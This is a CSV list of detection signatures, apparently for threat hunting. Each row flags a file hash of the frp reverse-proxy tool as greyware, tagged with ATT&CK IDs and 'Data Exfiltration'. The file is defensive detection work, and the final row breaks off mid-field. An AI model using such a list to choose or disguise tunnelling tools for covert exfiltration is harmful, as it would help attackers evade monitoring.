"*043cd981e81f756123ea4501569ad8d1fbb8166d1046b349ca423aa6ddc0ce31*",".{0,1000}043cd981e81f756123ea4501569ad8d1fbb8166d1046b349ca423aa6ddc0ce31.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*0476f68f4552ae460d72f0b6c2c9fd4b6fb8dfdbafdec62695f02996d7221f81*",".{0,1000}0476f68f4552ae460d72f0b6c2c9fd4b6fb8dfdbafdec62695f02996d7221f81.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*04d9eaf4997d1407feca0324beedaca577c63fa900ef04e6a97de9e8e2391e34*",".{0,1000}04d9eaf4997d1407feca0324beedaca577c63fa900ef04e6a97de9e8e2391e34.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*05cea2ca577a0dc7a1b8e6393547442174c1035818791f2a4e784471ab9dfcf0*",".{0,1000}05cea2ca577a0dc7a1b8e6393547442174c1035818791f2a4e784471ab9dfcf0.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*05e2ba6184dcebe6fa334c2a1d4534433e8ff9372636ff98eef96e414212903c*",".{0,1000}05e2ba6184dcebe6fa334c2a1d4534433e8ff9372636ff98eef96e414212903c.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*0679e059dfca6cd022caf808ffe2709207377463a31ccddee1bcb75c161b341c*",".{0,1000}0679e059dfca6cd022caf808ffe2709207377463a31ccddee1bcb75c161b341c.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*076d9ce5c8644dbeb313e2d90349ad33d3b718b2701899480573266b3f6f0e6a*",".{0,1000}076d9ce5c8644dbeb313e2d90349ad33d3b718b2701899480573266b3f6f0e6a.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*07a0651b2053508bab9370df884096effa653cb24cfd8c454c438b15971ece63*",".{0,1000}07a0651b2053508bab9370df884096effa653cb24cfd8c454c438b15971ece63.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*081e0f8ba995218e30ad3c0fa7a12493f17dcbbbac73fdae4391fddf8af2f918*",".{0,1000}081e0f8ba995218e30ad3c0fa7a12493f17dcbbbac73fdae4391fddf8af2f918.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*084d3c601a9f5d100ad3be26d94b643f2843fa64dcc5f2f2057c612bf7f9d4f1*",".{0,1000}084d3c601a9f5d100ad3be26d94b643f2843fa64dcc5f2f2057c612bf7f9d4f1.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*08589a1a9ab1159cdd8a156c28bf19b64c0587bd9a415affd19a15ea86441d06*",".{0,1000}08589a1a9ab1159cdd8a156c28bf19b64c0587bd9a415affd19a15ea86441d06.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*09329200234dd56722e095ee5b0b3d31bf8d39f3bdacb4a473b9144a7e8e8b7d*",".{0,1000}09329200234dd56722e095ee5b0b3d31bf8d39f3bdacb4a473b9144a7e8e8b7d.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*0950dbcd22a110b50c7636f2ff7ca73ee120568d375d75539546c6590cd75ce9*",".{0,1000}0950dbcd22a110b50c7636f2ff7ca73ee120568d375d75539546c6590cd75ce9.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*09e451ce640afddb9ba25ed619bf2b26b8d080dbf3d09a3ac22f4d365d7832d3*",".{0,1000}09e451ce640afddb9ba25ed619bf2b26b8d080dbf3d09a3ac22f4d365d7832d3.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*0ac137ea9061aea6b6e8e5fc228b1082e14d3e29cafe6103f542ac4ffd728843*",".{0,1000}0ac137ea9061aea6b6e8e5fc228b1082e14d3e29cafe6103f542ac4ffd728843.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*0b938c1c8389829602f511b4d8ebbe8f6d2ae6fb4e5a88540b1699c922a63610*",".{0,1000}0b938c1c8389829602f511b4d8ebbe8f6d2ae6fb4e5a88540b1699c922a63610.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*0bf96f473385bbeb64faad3caec3ad721187b328f2228820e49838e187da0e22*",".{0,1000}0bf96f473385bbeb64faad3caec3ad721187b328f2228820e49838e187da0e22.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*0ccc051693da612b7c4eed265598d3c8878019cb21e6ec9e3869f94b93e6ca80*",".{0,1000}0ccc051693da612b7c4eed265598d3c8878019cb21e6ec9e3869f94b93e6ca80.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*0cd33dcfe9a38441eda2c60675f05ab3c3875b1e54608583d50d0835c567a30e*",".{0,1000}0cd33dcfe9a38441eda2c60675f05ab3c3875b1e54608583d50d0835c567a30e.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*0d05e3ebd2490c026e1b8f6780d901eedde65562af02acf3bf80d729a2aae52b*",".{0,1000}0d05e3ebd2490c026e1b8f6780d901eedde65562af02acf3bf80d729a2aae52b.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*0e8f1915a1e2b1b2d37b11e831e49fb5f5fc2a14eea086f7ea5a1e4112095728*",".{0,1000}0e8f1915a1e2b1b2d37b11e831e49fb5f5fc2a14eea086f7ea5a1e4112095728.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*0f7acf26d92d39a2e3965ee91bf60e7c331844a1d7e81078ede526cf0459eccd*",".{0,1000}0f7acf26d92d39a2e3965ee91bf60e7c331844a1d7e81078ede526cf0459eccd.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*0fd011fb817fa36fe8735e3d97df523970d9be4f56f0848840f737b63ba37fbf*",".{0,1000}0fd011fb817fa36fe8735e3d97df523970d9be4f56f0848840f737b63ba37fbf.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*1084631215170fc83b2de13f156a3b0e2ea02f2a0955fc94d3c6c5015391922c*",".{0,1000}1084631215170fc83b2de13f156a3b0e2ea02f2a0955fc94d3c6c5015391922c.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*11f2af35bdaa799a38a180a1b73083d68843cf731ecea118a33597a14289589e*",".{0,1000}11f2af35bdaa799a38a180a1b73083d68843cf731ecea118a33597a14289589e.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*125f87d334addd8ec7dacaf2a321a9f1c9a8b31c8a673d2d02808162cd67f997*",".{0,1000}125f87d334addd8ec7dacaf2a321a9f1c9a8b31c8a673d2d02808162cd67f997.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*13102618f84a2efa07a90733d9bae72e48b897c29f4df4b38bdacebb99517e52*",".{0,1000}13102618f84a2efa07a90733d9bae72e48b897c29f4df4b38bdacebb99517e52.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*136cc6be28c798b2493875f498b5956a876c24cdbd028773aa9194c8bd846442*",".{0,1000}136cc6be28c798b2493875f498b5956a876c24cdbd028773aa9194c8bd846442.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*13ac5e018ec166c098c2d67635068ad1b18247aaf02a8537532f52b4fda2dd29*",".{0,1000}13ac5e018ec166c098c2d67635068ad1b18247aaf02a8537532f52b4fda2dd29.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*13f227bc915c43961e1f3831f155c6934e7d5a65434af3b29bf494b1d5d276b7*",".{0,1000}13f227bc915c43961e1f3831f155c6934e7d5a65434af3b29bf494b1d5d276b7.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*140fc748db03438c09c3fe5def7e4ef2b273462d567a851addc97728fc8a2fcd*",".{0,1000}140fc748db03438c09c3fe5def7e4ef2b273462d567a851addc97728fc8a2fcd.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*1411f74ca4f05e63963448b9d0c972e16cbf98ba81864e1c04de0492ebd0c6fa*",".{0,1000}1411f74ca4f05e63963448b9d0c972e16cbf98ba81864e1c04de0492ebd0c6fa.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*14c37cbee05947b2c67fe8064c132652b363c8b0d72fa401ddaf93efdc9538e3*",".{0,1000}14c37cbee05947b2c67fe8064c132652b363c8b0d72fa401ddaf93efdc9538e3.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*176cc43f9796b4b47ad831a03ef5093fbe954caa2a088e136941aea93e0f6a70*",".{0,1000}176cc43f9796b4b47ad831a03ef5093fbe954caa2a088e136941aea93e0f6a70.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*1837335417e0bfa4c1caf7ce94047e1ba8020983c246b25679dc5efced9dae75*",".{0,1000}1837335417e0bfa4c1caf7ce94047e1ba8020983c246b25679dc5efced9dae75.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*183ee0c672409cdd8b421f31e2b81753a4713bee962e1edf97f1455cda97173d*",".{0,1000}183ee0c672409cdd8b421f31e2b81753a4713bee962e1edf97f1455cda97173d.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*184669dc9168ac60ebc0afc08ca54473d9e6de933b731cb914f5d4ad836516c4*",".{0,1000}184669dc9168ac60ebc0afc08ca54473d9e6de933b731cb914f5d4ad836516c4.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*18740144d6c91dea850c695590973733ababc0634ca18073d2faec296f572b07*",".{0,1000}18740144d6c91dea850c695590973733ababc0634ca18073d2faec296f572b07.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*18b6a345f7d4fb9250b8d751a99f58a0a2daace02a1f7a4e7bb567237e681335*",".{0,1000}18b6a345f7d4fb9250b8d751a99f58a0a2daace02a1f7a4e7bb567237e681335.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*18ee2a78c352eeceb07d55ba572955af64b14282914fe77edf632baf4ce0f967*",".{0,1000}18ee2a78c352eeceb07d55ba572955af64b14282914fe77edf632baf4ce0f967.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*19ca9f2b318ea2efbe9f2b213c2edd68de54c7ed35dc3f291146c67374d8c57d*",".{0,1000}19ca9f2b318ea2efbe9f2b213c2edd68de54c7ed35dc3f291146c67374d8c57d.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*1a1a729fe607c59dae787bc5322efcf8cc5a9e87623c6d10e2a08531829bb9fb*",".{0,1000}1a1a729fe607c59dae787bc5322efcf8cc5a9e87623c6d10e2a08531829bb9fb.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*1a527c78ae25fa3e393d70fbfcea5b928ca96a689d8e82477f1b0db0cfc51e76*",".{0,1000}1a527c78ae25fa3e393d70fbfcea5b928ca96a689d8e82477f1b0db0cfc51e76.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*1a8d2c5bfe3a0367068cdf890b025258e5614c3fef308985c001500902692817*",".{0,1000}1a8d2c5bfe3a0367068cdf890b025258e5614c3fef308985c001500902692817.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*1b3c61129cf7b45ad41a6b297f4425b9e700cf6302c8969232c7587ae7e727d9*",".{0,1000}1b3c61129cf7b45ad41a6b297f4425b9e700cf6302c8969232c7587ae7e727d9.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*1ca8187c73c3c75ace29675193659f9d6ddff3e5ddf2131f49f156844ca7d778*",".{0,1000}1ca8187c73c3c75ace29675193659f9d6ddff3e5ddf2131f49f156844ca7d778.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*1cda556f00b20f5b575ba40f83d8a007a8fa3308ef502c62fb7510989c3b7b10*",".{0,1000}1cda556f00b20f5b575ba40f83d8a007a8fa3308ef502c62fb7510989c3b7b10.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*1d5b17f54911bc22816b0d72b32c258b259eb912d9d0484fdc949a315f5a5d42*",".{0,1000}1d5b17f54911bc22816b0d72b32c258b259eb912d9d0484fdc949a315f5a5d42.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*1e5b997597bacce1d971b83416c2f8c9cde0cbd294e6b11d91a3939f9c6356a9*",".{0,1000}1e5b997597bacce1d971b83416c2f8c9cde0cbd294e6b11d91a3939f9c6356a9.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*1f1eefdf6a9ade3923edcd716c56941f2755848a4bd97167aaa1ceebfed95194*",".{0,1000}1f1eefdf6a9ade3923edcd716c56941f2755848a4bd97167aaa1ceebfed95194.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*1fe64b366408022e4d61c1e37f64e268f7e72f4d351425df36c35fb1cfc534fd*",".{0,1000}1fe64b366408022e4d61c1e37f64e268f7e72f4d351425df36c35fb1cfc534fd.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*200244a2c1bc9e186f875c23d0b78c9ab59a88052f4f4132e5c28a70fdc356b6*",".{0,1000}200244a2c1bc9e186f875c23d0b78c9ab59a88052f4f4132e5c28a70fdc356b6.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*214801dc012036d847beecbb5c2a03f64bfc50d601f79da86a4a783fc0323273*",".{0,1000}214801dc012036d847beecbb5c2a03f64bfc50d601f79da86a4a783fc0323273.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*21b32cdaf6e4c74a88a0b6c3c377a3d40a23f73c0313625fa63ba4a6542616fe*",".{0,1000}21b32cdaf6e4c74a88a0b6c3c377a3d40a23f73c0313625fa63ba4a6542616fe.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*21d0ed799e2d277a941a92a68b69a1ad4cdfe058fbdc6cb6141fff2c81421c57*",".{0,1000}21d0ed799e2d277a941a92a68b69a1ad4cdfe058fbdc6cb6141fff2c81421c57.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*220583e20edd98369dbe929d215a387ceea937b0e0637f62558506b2a6c603a2*",".{0,1000}220583e20edd98369dbe929d215a387ceea937b0e0637f62558506b2a6c603a2.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*22c7719b9a9d0ba2a43e85623677983dc550957a9f1d855994eb33d2e4db913e*",".{0,1000}22c7719b9a9d0ba2a43e85623677983dc550957a9f1d855994eb33d2e4db913e.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*22df14e317c351bda4bfaf256c46b6ec281304135ea24c00bb2a71a5e14d4f22*",".{0,1000}22df14e317c351bda4bfaf256c46b6ec281304135ea24c00bb2a71a5e14d4f22.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data 